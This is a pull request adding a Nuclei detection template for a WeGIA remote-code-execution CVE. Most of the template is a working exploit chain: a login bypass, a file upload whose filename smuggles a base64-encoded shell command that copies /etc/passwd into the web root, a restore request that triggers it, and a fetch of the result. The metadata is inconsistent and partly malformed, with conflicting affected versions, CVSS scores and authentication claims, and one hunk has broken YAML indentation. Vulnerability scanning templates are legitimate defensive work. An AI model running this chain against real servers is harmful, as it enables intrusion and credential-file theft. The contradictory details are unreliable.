### PR TITLE
Add CVE-2026-28409.yaml - WeGIA <= 3.6.4 - Remote Code Execution

### DIFF
--- a/http/cves/2026/CVE-2026-28409.yaml
+++ b/http/cves/2026/CVE-2026-28409.yaml
@@ -26,7 +26,7 @@ info:
     product: wegia
     shodan-query: http.html:"WeGIA"
     fofa-query: body="WeGIA"
-  tags: cve,cve2026,wegia,rce,cmdi,auth-bypass,unauth
+  tags: cve,cve2026,wegia,rce
 
 variables:
   filename: "{{to_lower(rand_text_alpha(8))}}"

--- a/http/cves/CVE-2026-28409.yaml
+++ b/http/cves/CVE-2026-28409.yaml
@@ -15,7 +15,8 @@ info:
     - https://github.com/LabRedesCefetRJ/WeGIA
     - https://nvd.nist.gov/vuln/detail/CVE-2026-28409
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
+cvss-score: 7.2
     cvss-score: 10.0
     cve-id: CVE-2026-28409
     cwe-id: CWE-78

--- a/http/cves/CVE-2026-28409.yaml
+++ b/http/cves/CVE-2026-28409.yaml
@@ -5,18 +5,17 @@ info:
   author: 0x_Akoko
   severity: critical
   description: |
-   WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands
+    WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands
   impact: |
-   Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise.
+    Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise.
   remediation: |
-   Upgrade to version 3.6.5 or later.
+    Upgrade to version 3.6.5 or later.
   reference:
     - https://cxsecurity.com/issue/WLB-2026030009
     - https://github.com/LabRedesCefetRJ/WeGIA
     - https://nvd.nist.gov/vuln/detail/CVE-2026-28409
   classification:
-cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
-cvss-score: 7.2
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
     cvss-score: 10.0
     cve-id: CVE-2026-28409
     cwe-id: CWE-78

--- a/http/cves/CVE-2026-28409.yaml
+++ b/http/cves/CVE-2026-28409.yaml
@@ -1,0 +1,114 @@
+id: CVE-2026-28409
+
+info:
+  name: WeGIA <= 3.6.4 - Remote Code Execution
+  author: 0x_Akoko
+  severity: critical
+  description: |
+   WeGIA <= 3.6.5 contains a remote code execution caused by improper validation of backup file names in the database restoration functionality, letting attackers with administrative access execute arbitrary OS commands
+  impact: |
+   Attackers with admin access can execute arbitrary OS commands, potentially leading to full server compromise.
+  remediation: |
+   Upgrade to version 3.6.5 or later.
+  reference:
+    - https://cxsecurity.com/issue/WLB-2026030009
+    - https://github.com/LabRedesCefetRJ/WeGIA
+    - https://nvd.nist.gov/vuln/detail/CVE-2026-28409
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
+    cvss-score: 10.0
+    cve-id: CVE-2026-28409
+    cwe-id: CWE-78
+  metadata:
+    verified: true
+    max-request: 4
+    vendor: labredescefetRJ
+    product: wegia
+    shodan-query: http.html:"WeGIA"
+    fofa-query: body="WeGIA"
+  tags: cve,cve2026,wegia,rce,cmdi,auth-bypass,unauth
+
+variables:
+  filename: "{{to_lower(rand_text_alpha(8))}}"
+
+flow: http(1) && http(2) && http(3) && http(4)
+
+http:
+  - raw:
+      - |
+        POST /WeGIA/html/login.php HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        c=true&cpf=admin&id_pessoa=1
+
+    extractors:
+      - type: regex
+        name: session
+        part: header
+        group: 1
+        regex:
+          - 'PHPSESSID=([a-zA-Z0-9]+)'
+        internal: true
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+        internal: true
+
+  - raw:
+      - |
+        POST /WeGIA/html/configuracao/importar_dump.php HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: PHPSESSID={{session}}
+        Content-Type: multipart/form-data; boundary=----test0boundary
+
+        ------test0boundary
+        Content-Disposition: form-data; name="usuario"
+
+        1
+        ------test0boundary
+        Content-Disposition: form-data; name="id_pessoa"
+
+        1
+        ------test0boundary
+        Content-Disposition: form-data; name="import"; filename="dump;export F={{filename}};eval $(echo Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ= | base64 -d);poc.dump.tar.gz"
+        Content-Type: application/gzip
+
+        {{hex_decode("1f8b08000000000000030300000000000000000000")}}
+        ------test0boundary--
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 302'
+        internal: true
+
+  - raw:
+      - |
+        GET /WeGIA/html/configuracao/gerenciar_backup.php?action=restore&file=dump%3Bexport+F%3D{{filename}}%3Beval+%24%28echo+Y2F0IC9ldGMvcGFzc3dkID4gL3Zhci93d3cvaHRtbC9XZUdJQS8kRi50eHQ%3D+%7C+base64+-d%29%3Bpoc.dump.tar.gz&usuario=1&id_pessoa=1 HTTP/1.1
+        Host: {{Hostname}}
+        Cookie: PHPSESSID={{session}}
+
+    matchers:
+      - type: dsl
+        dsl:
+          - 'status_code == 200'
+        internal: true
+
+  - raw:
+      - |
+        GET /WeGIA/{{filename}}.txt HTTP/1.1
+        Host: {{Hostname}}
+
+    matchers-condition: and
+    matchers:
+      - type: regex
+        part: body
+        regex:
+          - "root:.*:0:0:"
+
+      - type: status
+        status:
+          - 200


### PR DESCRIPTION
CVE-2026-28409 details added, highlighting a critical remote code execution vulnerability in WeGIA versions <= 3.6.4. The YAML file includes information on impact, remediation, and example HTTP requests.

### PR Information

<!-- Explains the information and/or motivation for update or/ creating this templates -->
<!-- Please include any reference to your template if available -->

- Fixed CVE-2020-XXX / Added CVE-2020-XXX / Updated CVE-2020-XXX
- References:

### Template validation

<!-- Clarifies if the valdation of the template was done on an actual system for which the template was developed -->
<!-- If this concerns a vulnerability check, please clarify if validation was done on a known vulnerable system and optionally on a known not vulnerable system to avoid false positives -->

- [x] Validated with a host running a vulnerable version and/or configuration (True Positive)
- [ ] Validated with a host running a patched version and/or configuration (avoid False Positive)

#### Additional Details (leave it blank if not applicable)

<!-- Include `nuclei -debug` output along with Shodan / Fofa / Google Query / Docker or screenshots if available -->
<!-- Please do NOT include vulnerable host information in pull requests -->
<!-- None of the prerequisites are obligatory; they are merely intended to speed the review process. -->

### Additional References:

- [Nuclei Template Creation Guideline](https://docs.projectdiscovery.io/templates/introduction)
- [Nuclei Template Matcher Guideline](https://github.com/projectdiscovery/nuclei-templates/wiki/Unique-Template-Matchers)
- [Nuclei Template Contribution Guideline](https://github.com/projectdiscovery/nuclei-templates/blob/master/CONTRIBUTING.md)
- [PD-Community Discord server](https://discord.gg/projectdiscovery)
